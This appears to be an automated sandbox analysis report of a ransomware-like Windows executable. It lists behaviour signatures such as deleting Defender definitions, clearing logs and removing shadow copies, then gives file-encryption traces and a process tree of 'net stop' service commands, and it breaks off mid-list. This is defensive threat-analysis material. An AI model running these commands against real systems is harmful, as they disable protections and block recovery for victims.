Resubmissions
12-01-2022 20:48
220112-zlnz9adhf2 1012-01-2022 19:37
220112-yb5pksdgc6 1012-01-2022 19:25
220112-x5evksdgdl 1012-01-2022 16:50
220112-vb8jpadcc4 10Analysis
-
max time kernel
44s -
max time network
16s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:25
Static task
static1
Behavioral task
behavioral1
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win10-en-20211208
General
-
Target
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
-
Size
2.6MB
-
MD5
47f540350b1d360403225d146cc7fbb8
-
SHA1
43ad25b99cb47c7367b1703315402bb9e4970590
-
SHA256
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
-
SHA512
91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2124 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2060 bcdedit.exe 2084 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exedescription ioc process File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_shAMFEMgwT80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_oahjWh0W5XI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_M8XkCRnD5WY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcer.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_g9rixWu2cG80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\CollectSignatures_Init.xsn.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_KYVLwIVd6Kw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mdM9cGavobQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_INkUS0-cPBY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_RfLNRchu-OI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_SGT8URzAQBA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_497_upyDxr80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_yzv7fGQeusc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.ELM.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nJFdfIuywj40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_sxbAxYEGbIk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_gh7HKWwFaCc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00687_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_7nYtHetx2wE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR39F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_8cOWmM0P3fE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_v-Dji1ArOpY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_6TOpSANo4tQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00391_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_qxjzNKqX7eM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ggDLiAovPcM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_IGgRsQMT1b40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_s4ScfK4JFks0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\UnlockClose.wdp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_K-QvJQ8ZjFM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_A3dzxAxRhvc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_48.jpg cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mwdAM9IcPIA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\Services\verisign.bmp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nwBcysLdQJo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ldJSXuI5Szc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_C5Mmz3yuyNY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-2pyxKznThM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_wU5YPL8KIgU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Media Player\de-DE\setup_wm.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_uwsrTcepxOs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_m45q3VgObc80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_3roULLG0Q-o0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_Liwi_NnikTc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwresmlm.dat cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_fIVVazX-qVc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_hWR8tHXnklg0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_vw1BQm7TVVA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_xhxn1-Xw-8k0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_okdJzt01E140.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_QSxGsNbzmGs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GEJMpGZaN-00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_NwJQOh75ixA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_DijtvB6KpR80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ORU5jAhnJRQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GPy6rxBomDk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-wMe8YHV2fM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 816 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.execce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exepid process 2156 powershell.exe 2248 powershell.exe 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exepowershell.exepowershell.exedescription pid process Token: SeSecurityPrivilege 2000 wevtutil.exe Token: SeBackupPrivilege 2000 wevtutil.exe Token: SeSecurityPrivilege 1948 wevtutil.exe Token: SeBackupPrivilege 1948 wevtutil.exe Token: SeSecurityPrivilege 524 wevtutil.exe Token: SeBackupPrivilege 524 wevtutil.exe Token: SeIncreaseQuotaPrivilege 832 wmic.exe Token: SeSecurityPrivilege 832 wmic.exe Token: SeTakeOwnershipPrivilege 832 wmic.exe Token: SeLoadDriverPrivilege 832 wmic.exe Token: SeSystemProfilePrivilege 832 wmic.exe Token: SeSystemtimePrivilege 832 wmic.exe Token: SeProfSingleProcessPrivilege 832 wmic.exe Token: SeIncBasePriorityPrivilege 832 wmic.exe Token: SeCreatePagefilePrivilege 832 wmic.exe Token: SeBackupPrivilege 832 wmic.exe Token: SeRestorePrivilege 832 wmic.exe Token: SeShutdownPrivilege 832 wmic.exe Token: SeDebugPrivilege 832 wmic.exe Token: SeSystemEnvironmentPrivilege 832 wmic.exe Token: SeRemoteShutdownPrivilege 832 wmic.exe Token: SeUndockPrivilege 832 wmic.exe Token: SeManageVolumePrivilege 832 wmic.exe Token: 33 832 wmic.exe Token: 34 832 wmic.exe Token: 35 832 wmic.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1928 wrote to memory of 1984 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1984 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1984 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1984 wrote to memory of 524 1984 net.exe net1.exe PID 1984 wrote to memory of 524 1984 net.exe net1.exe PID 1984 wrote to memory of 524 1984 net.exe net1.exe PID 1928 wrote to memory of 472 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 472 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 472 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 472 wrote to memory of 1416 472 net.exe net1.exe PID 472 wrote to memory of 1416 472 net.exe net1.exe PID 472 wrote to memory of 1416 472 net.exe net1.exe PID 1928 wrote to memory of 1464 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1464 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1464 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1464 wrote to memory of 1396 1464 net.exe net1.exe PID 1464 wrote to memory of 1396 1464 net.exe net1.exe PID 1464 wrote to memory of 1396 1464 net.exe net1.exe PID 1928 wrote to memory of 540 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 540 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 540 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 540 wrote to memory of 1752 540 net.exe net1.exe PID 540 wrote to memory of 1752 540 net.exe net1.exe PID 540 wrote to memory of 1752 540 net.exe net1.exe PID 1928 wrote to memory of 1508 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1508 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1508 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1508 wrote to memory of 620 1508 net.exe net1.exe PID 1508 wrote to memory of 620 1508 net.exe net1.exe PID 1508 wrote to memory of 620 1508 net.exe net1.exe PID 1928 wrote to memory of 2028 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 2028 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 2028 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2028 wrote to memory of 2044 2028 net.exe net1.exe PID 2028 wrote to memory of 2044 2028 net.exe net1.exe PID 2028 wrote to memory of 2044 2028 net.exe net1.exe PID 1928 wrote to memory of 1048 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1048 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1048 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1048 wrote to memory of 1968 1048 net.exe net1.exe PID 1048 wrote to memory of 1968 1048 net.exe net1.exe PID 1048 wrote to memory of 1968 1048 net.exe net1.exe PID 1928 wrote to memory of 1084 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1084 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1928 wrote to memory of 1084 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1084 wrote to memory of 736 1084 net.exe net1.exe PID 1084 wrote to memory of 736 1084 net.exe net1.exe PID 1084 wrote to memory of 736 1084 net.exe net1.exe PID 1928 wrote to memory of 964 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 964 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 964 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1196 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1196 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1196 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1900 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1900 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1900 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1712 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1712 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1712 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1020 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1020 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1020 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1928 wrote to memory of 1924 1928 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:524
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1416
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1396
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1752
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
